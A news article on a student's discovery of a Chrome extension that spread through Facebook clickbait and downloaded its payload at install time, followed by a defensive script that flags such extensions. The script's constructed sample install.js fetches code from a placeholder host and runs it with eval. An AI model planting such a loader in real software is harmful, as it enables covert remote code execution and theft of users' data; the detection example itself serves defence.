Isn't it strange when, all of a sudden, a Facebook friend's feed is flooded with obscene clickbait and sketchy links? Maxime Kjaer, a 19-year-old computer science student at the Swiss Federal Institute of Technology, decided to answer that question after noticing a friend's Facebook page covered with Likes for a link called “Basic Kissing Tips”.
“Intrigued, I decided to go down the rabbit hole and see what this was all about,” blogged Kjaer.
He found a piece of Google Chrome malware (in his own words, a “glaring security hole”) that infects the browser via a fake age verification extension. The first thing he did was ‘like’ his friend's raunchy link, and he was immediately asked to verify his age by installing the Viral Content Age Verify Chrome browser extension. Through the malware, all your data on the websites can be read and changed: your emails, login data and even your credit card information. On installation, a file called manifest.json loads three scripts (background.js, query-string.js and install.js). Only the install.js script is harmful, as it picks up the malware via two URLs: the first to receive instructions and the second to report back.
The first thing Kjaer was instructed to do was to like a Facebook page called VVideosss, which gave the malware developers access to his username and password and the ability to control his profile. Once he did what he was told, he noticed that the malware reported back with all the collected information: the PC identification, the version of the extension you are infected with and even whether or not you are currently logged into Facebook.
Both Google and the servers' hosting company, DigitalOcean, were immediately notified of the problem, and they took down the servers and stopped the extensions. However, the Viral Content Age Verify extension, with its nine versions, had managed to infect over 130,000 users before being blacklisted.
“All the machines technically remain infected, but the malware will be defused. Still, that’s a patched security vulnerability on 130,000 machines at once. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me.” Kjaer said.
Kjaer even got a reply from Google confirming that they had blocked the extensions and assuring him that they had been automatically deleted from the infected machines as well. He did not decry their move but still scolded them for not improving their security approach.
“The fact is that the current malware detection on the Chrome Webstore is a joke,” he stated, “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it. This has been the case for years now, and it doesn’t seem like Google is doing much about it. They offer 5-digit bug bounties for vulnerabilities in Chrome, and yet they leave this glaring security hole virtually unguarded!”
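The install-time download described above can be looked for from the defender's side by statically triaging an unpacked extension: read manifest.json, list the scripts it declares, and flag any script that both talks to the network and executes dynamic code. The following is an added example, not code from Kjaer's write-up or from the extension; the file contents, the `example.invalid` URL and all function names are constructed for illustration, and only the three script names come from the article.

```javascript
// Defender-side static triage of an unpacked Chrome extension (added example).
// File contents are CONSTRUCTED; only the three script names come from the article.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);
// Signals that a script pulls code from the network and runs it after install.
const SIGNALS = [
  { name: "remote URL literal", re: /["'`]https?:\/\/[^"'`\s]+["'`]/ },
  { name: "network fetch", re: /\b(XMLHttpRequest|fetch)\b/ },
  { name: "dynamic execution", re: /\b(eval|Function|executeScript)\s*\(/ },
];

// Collect every script the manifest declares (Manifest V2 and V3 field names).
function declaredScripts(manifest) {
  const bg = manifest.background || {};
  const scripts = [...(bg.scripts || [])];
  if (bg.service_worker) scripts.push(bg.service_worker);
  for (const cs of manifest.content_scripts || []) scripts.push(...(cs.js || []));
  return [...new Set(scripts)];
}

function triageExtension(files) {
  const manifest = JSON.parse(files["manifest.json"]);
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  const report = { broadHostAccess: perms.filter((p) => BROAD_HOSTS.has(p)), scripts: {}, suspicious: [] };
  for (const name of declaredScripts(manifest)) {
    const src = files[name];
    if (src === undefined) { report.scripts[name] = ["missing from package"]; continue; }
    const hits = SIGNALS.filter((s) => s.re.test(src)).map((s) => s.name);
    report.scripts[name] = hits;
    // Fetch plus execute in one script matches "download the payload on installation".
    if (hits.includes("network fetch") && hits.includes("dynamic execution")) report.suspicious.push(name);
  }
  return report;
}

const sampleExtension = {
  "manifest.json": JSON.stringify({
    manifest_version: 2, name: "Constructed sample", version: "1.0",
    permissions: ["tabs", "<all_urls>"],
    background: { scripts: ["background.js", "query-string.js", "install.js"] },
  }),
  "background.js": "chrome.runtime.onInstalled.addListener(function () {});",
  "query-string.js": "function parse(q) { return q.split('&'); }",
  "install.js": "var x = new XMLHttpRequest();\n" +
    "x.open('GET', 'https://payload.example.invalid/instructions');\n" +
    "x.onload = function () { eval(x.responseText); }; x.send();",
};

console.log(JSON.stringify(triageExtension(sampleExtension), null, 2));
```

Pattern matching like this is a first-pass filter only: obfuscated or indirectly invoked code will slip past it, so a flagged script is a prompt for manual review rather than a verdict.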